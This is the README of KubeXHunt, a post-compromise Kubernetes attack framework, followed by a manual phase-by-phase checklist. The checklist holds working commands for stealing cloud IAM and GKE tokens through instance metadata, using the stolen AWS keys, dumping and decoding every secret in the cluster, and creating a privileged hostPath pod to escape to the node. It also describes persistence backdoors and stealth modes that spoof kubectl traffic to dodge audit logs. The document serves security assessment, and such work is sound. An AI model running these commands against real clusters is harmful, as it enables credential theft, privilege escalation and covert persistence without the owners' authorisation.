Skip to content

mr-xhunt/kubeXhunt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

25 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ KubeXHunt β€” Post-Compromise Kubernetes Attack Simulation Framework

KubeXHunt is an open-source post-compromise Kubernetes security assessment framework designed to simulate real-world attacker behavior from inside a compromised pod.

Instead of just scanning for misconfigurations, KubeXHunt demonstrates actual impact by validating access, exploiting weaknesses, and chaining findings into complete attack paths.

πŸ’‘ Think: BloodHound for Kubernetes + post-exploitation automation

Drop this tool onto any compromised pod and run a full automated assessment of the entire cluster. Zero external dependencies β€” pure Python 3 stdlib only. Runs on any pod with Python 3.6+.


Credits to Chandrapal Badshah for providing exceptional training on Kubernetes Security, which significantly contributed to the development of this tool and deepened my understanding of Kubernetes security practices.

Special thanks to Payatu for sponsoring and providing access to this training, enabling the research and development behind KubeXHunt.


Important

Starting Point: You have Remote Code Execution (RCE) inside a compromised pod. All commands are executed from inside that pod unless stated otherwise. Philosophy: Demonstrate impact without destroying β€” read, enumerate, prove, document.


πŸ€” Why KubeXHunt?

Most Kubernetes tools answer:

β€œWhat is misconfigured?”

KubeXHunt answers:

β€œWhat can an attacker actually do with this?”

Traditional Tools KubeXHunt
Misconfiguration scanning Post-compromise attack simulation
Static analysis Real API access validation
Flat findings list Attack path chaining
Assumes risk Proves impact

πŸ’₯ In under a minute, KubeXHunt can answer:

  • Can I become cluster-admin?
  • Can I reach cloud credentials (IMDS / Workload Identity)?
  • Can I escape to the node / host?
  • Can I pivot across namespaces / workloads?

βš–οΈ Comparison with Other Tools

Tool Focus Limitation
kube-bench CIS compliance No exploitation
kube-hunter External scanning Limited post-exploitation
kubescape Misconfig scanning No attack chaining
KubeXHunt πŸ”₯ Post-compromise attack simulation Shows real impact

Tool Version Language Dependencies Phases Author


⬇️ Download & Run

git clone https://github.com/mr-xhunt/kubeXhunt.git
cd kubeXhunt

# Alternatively directly download the tool on the compromised pod
wget https://raw.githubusercontent.com/mr-xhunt/kubeXhunt/refs/heads/main/kubexhunt.py

# Run full assessment
python3 kubexhunt.py

πŸš€ Usage

python3 kubexhunt.py [OPTIONS]

Options:
  --phase N [N ...]     Run specific phase(s) only (0-26)
  --fast                Skip slow checks (port scanning, DNS brute force)
  --stealth 0|1|2       Stealth level: 0=off  1=jitter+kubectl UA  2=full evasion
  --no-mutate           Skip all mutating API calls (safe for production clusters)
  --output FILE         Save report (.json / .html / .sarif / .txt)
  --diff PREV.json      Compare with previous scan β€” CI/CD gate mode
  --proxy URL           Route API calls through Burp Suite or HTTP proxy
  --exclude-phase N     Skip specific phase(s)
  --phase-list          Print all 27 phases and exit
  --no-color            Disable colored output (for log files / piping)
  --kubectl-only        Only install kubectl and exit
  -h, --help            Show help

Examples:

# Full assessment β€” all 27 phases
python3 kubexhunt.py

# Target specific phases
python3 kubexhunt.py --phase 3 7 15 16

# Read-only silent mode β€” safe for production
python3 kubexhunt.py --stealth 2 --no-mutate

# Save HTML report (self-contained, dark theme)
python3 kubexhunt.py --output report.html

# Save SARIF for GitHub Code Scanning / DefectDojo
python3 kubexhunt.py --output report.sarif

# Save JSON for diff comparison
python3 kubexhunt.py --output report.json

# CI/CD mode β€” fail pipeline on new CRITICAL/HIGH
python3 kubexhunt.py --diff previous.json --output new.json

# Route all API calls through Burp
python3 kubexhunt.py --proxy http://127.0.0.1:8080

# Skip slow DNS brute-force and port scanning
python3 kubexhunt.py --fast

# Skip supply chain and cloud phases
python3 kubexhunt.py --exclude-phase 9 10 11 20

# List all phases with descriptions
python3 kubexhunt.py --phase-list

⚑ Quick One-Liner (no file save)

# Run directly in memory β€” nothing written to disk
curl -s https://raw.githubusercontent.com/mr-xhunt/kubeXhunt/refs/heads/main/kubexhunt.py | python3 - --fast

🧠 How It Works

KubeXHunt follows a real attacker workflow:

Compromised Pod ↓ Credential Discovery (SA tokens, env, /proc) ↓ Kubernetes API Exploitation (RBAC, secrets, workloads) ↓ Lateral Movement (services, DNS, endpoints) ↓ Privilege Escalation (privileged pods, host access) ↓ Node Compromise ↓ Cloud Pivot (IMDS / IAM / Workload Identity) ↓ βš” Attack Path Generation

πŸ‘‰ Every step is validated in real-time, not assumed.


πŸ“‹ Phases Covered (v1.2.0 β€” 27 Phases)

Phase Name What It Checks
0 Setup & kubectl Install Auto-installs kubectl, searches host filesystem for existing binary, auto-configures in-cluster kubeconfig from SA token, detects cloud (AWS/GKE/Azure/OpenShift), scores token privilege
1 Pod & Container Recon Capabilities (CapEff), seccomp, AppArmor, privileged, hostPID, hostNetwork, block devices, runtime socket, container runtime detection (containerd/docker/cri-o via host filesystem + kubectl)
2 Cloud Metadata & IAM IMDSv1/v2 credential theft, GKE OAuth token, node SA scopes, IRSA token abuse
3 K8s API & RBAC SA permissions, secret theft, wildcard RBAC, impersonation, bind/escalate/TokenRequest abuse, cluster-admin bindings
4 Network & Lateral Movement Service discovery, DNS brute-force + SRV, recursive endpoint walking (advertises own endpoints), port scan, Istio/mTLS awareness, NetworkPolicy gaps, service mesh CRD detection, sniffing
5 Container Escape nsenter, chroot, Docker/containerd socket, cgroup v1 release_agent, user namespace unshare
6 Node Compromise Kubelet certs, projected volume SA token decode (sub field), all stolen tokens permission-tested, token privilege ranking (0-100), SSH keys, kubeconfig files
7 Cluster Escalation Privileged pod creation, ClusterRoleBinding escalation, webhook failurePolicy bypass, etcd encryption check, controller hijacking
8 Persistence Backdoor SA in kube-system, DaemonSet on all nodes, CronJob persistence, sidecar injection
9 Supply Chain Image signing (webhook + Kyverno CRD fallback), registry credential pivot (catalog API probe), PSS enforcement, Kyverno v1/v2 policies (403=installed), admission plugins
10 EKS-Specific aws-auth read/write, IRSA tokens, node IAM role, account enumeration
11 GKE-Specific Workload Identity, node SA scopes, legacy metadata endpoint, Dashboard, project enumeration
12 Runtime Security Multi-method detection: pod names + CRD probes + filesystem (403=installed), Tetragon TracingPolicies, Kyverno, Istio PeerAuthentication, exec-from-/tmp enforcement probe
13 Secrets & Data Env var credential scan, mounted secret files, app config credential grep
14 DoS & Resource Limits cgroup v1/v2 memory/CPU limits, ResourceQuota, LimitRange, audit logging (self-managed + EKS CloudWatch detection)
15 Cluster Intel & CVEs ⭐ K8s version β†’ real version-gated CVE comparison (no blanket fire), runc CVE-2024-21626 via containerd version mapping, kernel CVE range check (Linux only), API server public IP check, worker node public IP check, node enumeration with 5-method IP fallback
16 Kubelet Exploitation ⭐ Real node IPs via _get_node_ips() (kubectl/kubelet config/fib_trie/hostname -I/Downward API), port 10255 anonymous, port 10250 auth bypass, /pods credential harvest
17 etcd Exposure ⭐ Real node IPs, port 2379/2380 probe, no-TLS access, mTLS bypass, v3 keys endpoint secret dump
18 Helm & App Secrets ⭐ Helm release secret decode (base64+gzip), imagePullSecrets cluster-wide, app filesystem credential scan
19 /proc Credential Harvest ⭐ /proc/self/environ, co-process environ (cgroup-deduplicated from hostPID), hostPID host process scanning (kubelet/etcd/containerd only), Redis/ArgoCD token capture, Downward API node name extraction
20 Azure AKS ⭐ IMDS instance info, Managed Identity token theft (4 resources), Workload Identity, azure.json SP creds, AAD Pod Identity NMI
21 OpenShift / OKD ⭐ SCC enumeration, current pod SCC, route enumeration, internal registry creds, OAuth endpoint, project enumeration
22 Advanced Red Team ⭐ SA token audience abuse, DNS poisoning via NET_ADMIN/NET_RAW, controller hijacking, token scope comparison
23 Attack Chain Simulation ⭐ 4 real-world chains: Tesla-style IMDS breach, RBACβ†’Node, token theftβ†’wildcard RBAC, webhook bypassβ†’node escape
24 Stealth & Evasion ⭐ Audit log impact classification, --no-mutate shows PASS (zero write operations), runtime tool presence from CTX, stealth level recommendations
25 Network Plugin & Misc ⭐ CNI detection (Calico/Cilium/Weave/Flannel), kube-proxy mode, cluster-wide automount audit, default SA token check
26 Diff & Reporting ⭐ JSON diff vs previous scan, new/fixed/changed findings, CI/CD exit code 1 on new CRITICAL/HIGH

⭐ = New in v1.2.0


πŸ“Š Sample Output

╔══════════════════════════════════════════════════════════════════════════════════╗
β•‘   β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β•‘
β•‘   ...                                                                            β•‘
β•‘   Kubernetes Security Assessment Tool  v1.2.0                                    β•‘
β•‘   Starting from a Compromised Pod β†’ Full Cluster Audit + Attack Path Discovery   β•‘
β•‘   Author: Mayank Choubey                                                         β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

──────────────────────────────────────────────────────────────────────
  PHASE  2 β”‚ Cloud Metadata & IAM Credentials
  IMDS credential theft, GKE metadata, OAuth token exfiltration
──────────────────────────────────────────────────────────────────────

  β–Έ AWS IMDSv2 Credential Theft
  πŸ”΄ [CRITICAL] AWS IAM credentials stolen via IMDSv2
  β”‚          Role: eks-node-group-role | KeyId: ASIA...truncated...
  β”‚          Expires: 2026-03-18T14:30:00Z
  β”‚          export AWS_ACCESS_KEY_ID=ASIA... AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=...
  β”‚ βš‘ Fix:  Block 169.254.169.254/32 via NetworkPolicy

──────────────────────────────────────────────────────────────────────
  PHASE 23 β”‚ Real-World Attack Chain Simulation
──────────────────────────────────────────────────────────────────────

  β–Έ Chain 2: RBAC Misconfiguration β†’ Privileged Pod β†’ Node Root
  β†’ βœ“ Step 1: Can list/read secrets (RBAC misconfiguration)
  β†’ βœ“ Step 2: Can create privileged pods
  β†’ βœ“ Step 3: Privileged pod β†’ hostPath: / β†’ node root
  πŸ”΄ [CRITICAL] Attack Chain COMPLETE: RBAC β†’ Privileged Pod β†’ Node Root
  β”‚          Path: Over-permissive RBAC β†’ Create privileged pod with hostPath: /
  β”‚          β†’ chroot node β†’ steal all kubelet tokens β†’ pivot to every namespace

══════════════════════════════════════════════════════════════════════
  KUBEXHUNT v1.2.0 β€” FINAL ASSESSMENT REPORT
══════════════════════════════════════════════════════════════════════

  πŸ”΄ CRITICAL :    5
  🟠 HIGH     :   11
  🟑 MEDIUM   :    4
  πŸ”΅ LOW      :    2
  βœ… PASS     :   24
  ──────────────────────────────────────────
  Total Issues:   22

  Overall Risk: πŸ”΄ CRITICAL RISK β€” Immediate action required

  βš”  ATTACK PATH DISCOVERY
  Attack Path #1  (CRITICAL)
  Compromised Pod
     ↓ Privileged container β†’ nsenter -t 1 β†’ host bash
  Node Root
     ↓ Stolen SA tokens β†’ wildcard RBAC
  Permanent Cluster Admin

πŸ” Stealth Modes

Level Flag Behavior
0 (default) Full speed, Python urllib User-Agent, no delays
1 --stealth 1 kubectl User-Agent spoofing, 0.3–2s timing jitter
2 --stealth 2 Read-only inference, batched API calls, maximum jitter, fully evasive

Combined with --no-mutate (skips all POST/PATCH/DELETE calls β€” infers from RBAC only), stealth level 2 generates zero mutating audit log entries and blends into normal kubectl traffic.


πŸ“€ Report Formats

Format Flag Use Case
HTML --output report.html Self-contained dark-theme report, attack path diagrams, collapsible phase sections
JSON --output report.json Machine-readable, includes attack_paths + token_scores + summary
SARIF --output report.sarif SARIF 2.1.0 β€” GitHub Code Scanning, DefectDojo, any SAST pipeline
TXT --output report.txt Plain text, log-shippable, CI/CD friendly

βš” Attack Path Engine

KubeXHunt automatically builds a BloodHound-style attack graph across all phases. If a chain of vulnerabilities can lead from pod compromise to cluster-admin or cloud account takeover, it is printed at the end of the report as a complete step-by-step path.

Four built-in real-world chain simulations (Phase 23):

Chain Steps Based On
Pod RCE β†’ IMDS β†’ Cloud Account SA token β†’ cloud IMDS β†’ IAM credentials β†’ full cloud access Tesla cryptomining breach (2018)
RBAC β†’ Privileged Pod β†’ Node Root Over-permissive RBAC β†’ pod create β†’ hostPath: / β†’ chroot Most common K8s privilege escalation
Token Theft β†’ Wildcard RBAC β†’ Cluster Admin hostPath mount β†’ steal SA tokens β†’ find wildcard β†’ backdoor CRB Real-world cluster takeovers
Webhook Bypass β†’ Policy Bypass β†’ Node Escape failurePolicy=Ignore + unreachable service β†’ policy bypass Silent Kyverno/OPA bypass

πŸ† Token Privilege Scoring

Every SA token encountered (current pod + any stolen tokens) is scored 0–100 based on demonstrated API access:

  Token Privilege Ranking
  [100/100] β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ kube-system/default (stolen)
  [ 45/100] β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘ payments/payment-api
  [ 10/100] β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ default/webapp

  Best pivot token: kube-system/default (score 100/100)
  Abilities: list all secrets | list namespaces | list clusterrolebindings | ...

πŸ”„ CI/CD Diff Mode

Compare two scans and automatically fail the pipeline if new CRITICAL or HIGH findings appear:

# Baseline scan
python3 kubexhunt.py --output baseline.json

# After a cluster change β€” diff against baseline
python3 kubexhunt.py --diff baseline.json --output new.json
# β†’ exits with code 1 if new CRITICAL/HIGH found

Output shows new findings (regressions), fixed findings (improvements), and severity changes β€” allowing automated pipeline gating without manual review.


What Actually Happens β€” Phase-by-Phase Checklist

πŸ“‹ Table of Contents

# Phase Focus
0 Pre-Assessment Setup Confirm RCE, grab SA token, auto-configure kubectl in-cluster
1 Pod & Container Recon Capabilities, mounts, hostPID, hostNetwork
2 Cloud Metadata & IAM AWS IMDS, GKE metadata, credential theft
3 K8s API Enumeration RBAC exploitation, secret theft, cluster map
4 Network Recon & Lateral Movement Service discovery, port scan, recursive endpoint walk, Istio-aware pivot
5 Container Escape nsenter, chroot, socket, cgroup
6 Node-Level Compromise Kubelet certs, projected token decode, full permission test on all stolen tokens
7 Cluster Privilege Escalation Cluster-admin, privileged pods, etcd
8 Persistence Backdoor SA, DaemonSet, sidecar injection
9 Supply Chain & Admission Image signing (webhook + Kyverno CRD fallback), registry catalog pivot, PSS, Kyverno v1/v2
10 EKS-Specific aws-auth, IRSA, node IAM, CloudWatch
11 GKE-Specific Workload Identity, legacy metadata, scopes
12 Runtime Security Gaps Tetragon/Falco/Kyverno/Istio via pods + CRDs + filesystem, TracingPolicy, exec-from-/tmp
13 Secrets & Sensitive Data Env vars, mounted files, app configs
14 DoS & Resource Exhaustion cgroup v1/v2 limits, ResourceQuota, LimitRange, audit logging (self-managed + EKS CloudWatch)
15 Cluster Intel & CVEs ⭐ Real CVE version comparison, runc version check, API server public IP, worker node public IPs, node enum with 5-method fallback
16 Kubelet Exploitation ⭐ Real node IP via _get_node_ips(), anonymous kubelet, /pods credential harvest
17 etcd Exposure ⭐ Real node IP probing, unauthenticated etcd, TLS bypass, secret dump
18 Helm & App Secrets ⭐ Helm release decode, imagePullSecrets
19 /proc Harvesting ⭐ Process env harvest, cgroup-based pod PID dedup, hostPID host-only scanning, Redis/ArgoCD capture
20 Azure AKS ⭐ IMDS, Managed Identity, Workload Identity
21 OpenShift / OKD ⭐ SCCs, routes, OAuth, registry
22 Advanced Red Team ⭐ Token audience, DNS poisoning, controller hijack
23 Attack Chain Simulation ⭐ 4 complete attack chain proofs
24 Stealth & Evasion ⭐ Audit impact classification, --no-mutate PASS, runtime tool detection from CTX
25 Network Plugin & Misc ⭐ CNI, kube-proxy, SA token audit
26 Diff & Reporting ⭐ CI/CD diff, regression detection
↓ Findings Template Severity matrix, EKS vs GKE vs Azure vs OpenShift table

Severity Legend

Badge Level Action
πŸ”΄ CRITICAL Immediate cluster or cloud account compromise Stop assessment, report immediately
🟠 HIGH Significant privilege escalation or data exposure Report same day
🟑 MEDIUM Meaningful security gap, requires chaining Report in assessment
πŸ”΅ LOW Defence-in-depth gap, minimal direct impact Include in recommendations

πŸ”§ Phase 0: Pre-Assessment Setup

Note

Run this first. Sets up variables used throughout every other phase.

# Confirm execution context
id && whoami && hostname
uname -a
cat /etc/os-release

# Check what we can see
env | sort
cat /proc/self/status | grep -E "^Name|^Pid|^PPid|^Cap"

# Grab service account credentials (used in every Phase 3+ test)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)
API="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "Namespace : $NS"
echo "Token     : $([ -n "$TOKEN" ] && echo "βœ… PRESENT" || echo "❌ MISSING")"
echo "API       : $API"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"

# Auto-configure kubectl from SA token if kubeconfig is empty
# kubectl inside a pod has no kubeconfig by default β€” every command fails
# with "couldn't get current server API group list" without this step
kubectl config view | grep -q "clusters: null" && {
  echo "Configuring kubectl from SA token..."
  kubectl config set-cluster in-cluster     --server=$API     --certificate-authority=$CACERT
  kubectl config set-credentials $NS-sa --token=$TOKEN
  kubectl config set-context default     --cluster=in-cluster     --user=$NS-sa     --namespace=$NS
  kubectl config use-context default
  echo "βœ… kubectl configured with in-cluster credentials"
}
πŸ“Œ Expected Output (what to look for)
  • uid=0(root) β†’ running as root inside container
  • CapEff: 0000003fffffffff β†’ has capabilities
  • Token: βœ… PRESENT β†’ can call Kubernetes API
  • Namespace other than default β†’ tells you what workload you're in

πŸ” Phase 1: Pod & Container Recon

1.1 Capabilities Check

πŸ”΄ CRITICAL if CapEff = ffffffffffffffff β€” full kernel capabilities, equivalent to root on node

# Full capability dump
cat /proc/self/status | grep -E "^Cap(Eff|Prm|Inh|Bnd|Amb):"

# Human-readable decode (if capsh available)
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
CapEff Value Meaning Severity
0000000000000000 No capabilities βœ… Hardened
00000000a80425fb Default container caps πŸ”΅ Normal
0000003fffffffff Most caps present 🟠 HIGH
ffffffffffffffff ALL caps β€” fully privileged πŸ”΄ CRITICAL

1.2 Privileged Container Check

πŸ”΄ CRITICAL β€” privileged = root on node with full kernel access

# seccomp status: 0 = disabled
cat /proc/self/status | grep -i "seccomp"

# Raw disk / memory devices
ls -la /dev/sda /dev/nvme0n1 2>/dev/null && echo "πŸ”΄ RAW DISK ACCESSIBLE"
ls -la /dev/mem 2>/dev/null             && echo "πŸ”΄ RAW MEMORY ACCESSIBLE"
ls /sys/kernel/debug 2>/dev/null        && echo "🟠 KERNEL DEBUG ACCESSIBLE"

1.3 Filesystem & Mount Analysis

πŸ”΄ CRITICAL if host filesystem mounted β€” read /etc/shadow, kubelet certs, SSH keys

# What is mounted?
cat /proc/mounts | grep -v "overlay\|proc\|sys\|dev\|tmpfs\|cgroup"

# Is root filesystem read-only?
touch /test-$(date +%s) 2>&1 | grep -q "Read-only" && \
  echo "βœ… Read-only filesystem" || echo "🟑 Writable root filesystem"

# Host filesystem check
for mountpoint in /host /hostfs /node /rootfs /mnt/host; do
  [ -d "$mountpoint" ] && ls "$mountpoint/etc" 2>/dev/null && \
    echo "πŸ”΄ HOST FILESYSTEM MOUNTED AT: $mountpoint"
done

# Find ALL writable directories
find / -writable -type d 2>/dev/null | grep -v "proc\|sys\|dev\|run\|tmp" | head -20

1.4 hostPID & hostNetwork Check

πŸ”΄ CRITICAL β€” hostPID allows nsenter escape; hostNetwork exposes node services

# hostPID: PID 1 = systemd/init means we see the HOST process tree
echo "PID 1 is: $(cat /proc/1/comm)"
[ "$(cat /proc/1/comm)" = "systemd" ] && echo "πŸ”΄ hostPID ENABLED" || echo "βœ… Isolated PID namespace"

# hostNetwork: can we reach node-only services?
curl -s --max-time 3 http://localhost:10255/pods 2>/dev/null | \
  python3 -c "import sys,json; d=json.load(sys.stdin); print(f'πŸ”΄ KUBELET READ-ONLY EXPOSED β€” {len(d.get(\"items\",[]))} pods')" \
  2>/dev/null || echo "βœ… Kubelet 10255 not reachable"

curl -s --max-time 3 https://localhost:10250/pods -k 2>/dev/null | head -2 && \
  echo "πŸ”΄ KUBELET AUTHENTICATED API 10250 REACHABLE"

☁️ Phase 2: Cloud Metadata & IAM Credentials

2.1 AWS IMDSv1 β€” No Token Required (Legacy)

πŸ”΄ CRITICAL β€” zero authentication required

curl -s --max-time 5 http://169.254.169.254/latest/meta-data/ 2>/dev/null && \
  echo "πŸ”΄ IMDSv1 ACCESSIBLE β€” NO AUTH REQUIRED" || \
  echo "βœ… IMDSv1 blocked or not AWS"

2.2 AWS IMDSv2 β€” Full Credential Theft

πŸ”΄ CRITICAL if reachable β€” temporary IAM credentials for the node role

# Step 1: Get session token
IMDS_TOKEN=$(curl -s -X PUT \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  --max-time 5 \
  http://169.254.169.254/latest/api/token 2>/dev/null)

echo "IMDS reachable: $([ -n "$IMDS_TOKEN" ] && echo "πŸ”΄ YES β€” CREDENTIALS AT RISK" || echo "βœ… BLOCKED")"

# Step 2: Get attached IAM role
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
echo "IAM Role: $ROLE"

# Step 3: Steal credentials
curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE 2>/dev/null | \
  python3 -m json.tool

# Step 4: Instance identity (account ID, region)
curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/dynamic/instance-identity/document 2>/dev/null | \
  grep -E "accountId|region|instanceType"
πŸ”΄ Using Stolen AWS Credentials (from attacker machine)
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# Who am I?
aws sts get-caller-identity

# Enumerate permissions
aws iam list-attached-role-policies --role-name <role-name>

# ECR images
aws ecr describe-repositories
aws ecr list-images --repository-name <repo>

# EKS cluster info
aws eks list-clusters
aws eks describe-cluster --name <cluster>

# S3, Secrets Manager, SSM
aws s3 ls
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id <name>
aws ssm get-parameter --name <name> --with-decryption

2.3 GKE Metadata Server

πŸ”΄ CRITICAL if cloud-platform scope β€” full GCP API access

# GKE metadata
curl -s -H "Metadata-Flavor: Google" --max-time 5 \
  http://metadata.google.internal/computeMetadata/v1/ 2>/dev/null && \
  echo "πŸ”΄ GKE METADATA ACCESSIBLE" || echo "βœ… Blocked or not GKE"

# Steal OAuth2 token
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" 2>/dev/null

# Node scopes (cloud-platform = full GCP access)
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" 2>/dev/null

# Legacy endpoint β€” no header required
curl -s --max-time 5 \
  http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token \
  2>/dev/null && echo "πŸ”΄ LEGACY GKE METADATA β€” NO AUTH REQUIRED"

πŸ”‘ Phase 3: Kubernetes API Enumeration via RBAC

3.1 Check What the Service Account Can Do

πŸ”΄ CRITICAL if wildcard permissions

# Self-subject rules review β€” what can OUR token do?
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$NS\"}}" \
  | python3 -m json.tool 2>/dev/null

# Can we list secrets?
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" $API/api/v1/namespaces/$NS/secrets)
echo "List secrets in $NS: $([ "$RESULT" = "200" ] && echo "πŸ”΄ ALLOWED" || echo "βœ… DENIED ($RESULT)")"

# Cluster-wide?
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets)
echo "List ALL secrets cluster-wide: $([ "$RESULT" = "200" ] && echo "πŸ”΄ ALLOWED" || echo "βœ… DENIED ($RESULT)")"

3.2 Dangerous Verb Check β€” bind / escalate / impersonate

πŸ”΄ CRITICAL β€” these verbs allow direct privilege escalation without creating resources

# Test impersonation as system:admin
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:admin" \
  -H "Impersonate-Group: system:masters" \
  $API/api/v1/namespaces | python3 -c "
import sys, json
try:
    d = json.load(sys.stdin)
    print(f'πŸ”΄ IMPERSONATION ACCEPTED β€” {len(d.get(\"items\",[]))} namespaces visible as system:admin')
except:
    print('βœ… Impersonation rejected')
" 2>/dev/null

3.3 Secret Enumeration & Exfiltration

πŸ”΄ CRITICAL β€” database passwords, API keys, TLS certs, registry credentials

# List secrets with names
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/secrets | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for s in d.get('items', []):
    print(f'  πŸ“¦ {s[\"metadata\"][\"name\"]} (type: {s.get(\"type\",\"Opaque\")})')
"

# Decode and read a specific secret
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/secrets/<SECRET-NAME> | \
  python3 -c "
import sys, json, base64
d = json.load(sys.stdin)
print(f'Secret: {d[\"metadata\"][\"name\"]}')
for k, v in d.get('data', {}).items():
    try:
        decoded = base64.b64decode(v).decode()
        print(f'  πŸ”‘ {k}: {decoded}')
    except:
        print(f'  πŸ”‘ {k}: <binary data>')
"

# Dump ALL secrets cluster-wide (if permitted)
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets | \
  python3 -c "
import sys, json, base64
d = json.load(sys.stdin)
for item in d.get('items', []):
    ns = item['metadata']['namespace']
    name = item['metadata']['name']
    print(f'\n━━━ {ns}/{name} ━━━')
    for k, v in item.get('data', {}).items():
        try:
            decoded = base64.b64decode(v).decode()
            print(f'  {k}: {decoded[:120]}')
        except:
            print(f'  {k}: <binary>')
"

3.4 Full Cluster Enumeration

# All pods β€” build infrastructure map
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
print(f'Total pods: {len(d.get(\"items\",[]))}')
for p in d.get('items', []):
    ns = p['metadata']['namespace']
    name = p['metadata']['name']
    node = p.get('spec', {}).get('nodeName', '?')
    status = p.get('status', {}).get('phase', '?')
    print(f'  {ns:20} {name:40} node={node} [{status}]')
"

# All services
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/services | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for s in d.get('items', []):
    ns = s['metadata']['namespace']
    name = s['metadata']['name']
    ports = [str(p.get('port','?')) for p in s.get('spec',{}).get('ports',[])]
    cip = s.get('spec',{}).get('clusterIP','')
    print(f'  {ns:20} {name:30} {cip:16} ports={\"|\".join(ports)}')
"

# Find cluster-admin bindings
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for crb in d.get('items', []):
    role = crb.get('roleRef', {}).get('name', '')
    if role in ['cluster-admin', 'admin', 'edit']:
        print(f'\nπŸ”΄ POWERFUL BINDING: {crb[\"metadata\"][\"name\"]} β†’ {role}')
        for s in crb.get('subjects', []):
            print(f'   Subject: {s.get(\"kind\")} {s.get(\"namespace\",\"\")}/{s.get(\"name\")}')
"

3.5 Create Resources (Prove Create Permissions)

πŸ”΄ CRITICAL if pod creation succeeds

# Test pod creation
RESULT=$(curl -sk -o /tmp/pod-create-out.json -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/$NS/pods \
  -d '{"apiVersion":"v1","kind":"Pod","metadata":{"name":"assessment-probe"},
       "spec":{"containers":[{"name":"probe","image":"busybox","command":["sleep","60"]}]}}')
echo "Pod creation: $([ "$RESULT" = "201" ] && echo "πŸ”΄ ALLOWED β€” $RESULT" || echo "βœ… DENIED β€” $RESULT")"

# Escalate to privileged pod
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/$NS/pods \
  -d '{
    "apiVersion":"v1","kind":"Pod",
    "metadata":{"name":"assessment-privesc"},
    "spec":{
      "hostPID":true,"hostNetwork":true,
      "containers":[{
        "name":"escape","image":"busybox","command":["sleep","300"],
        "securityContext":{"privileged":true},
        "volumeMounts":[{"name":"host","mountPath":"/host"}]
      }],
      "volumes":[{"name":"host","hostPath":{"path":"/"}}]
    }
  }' | python3 -m json.tool

🌐 Phase 4: Network Recon & Lateral Movement

4.1 Internal Service Discovery

# K8s auto-injected service IPs
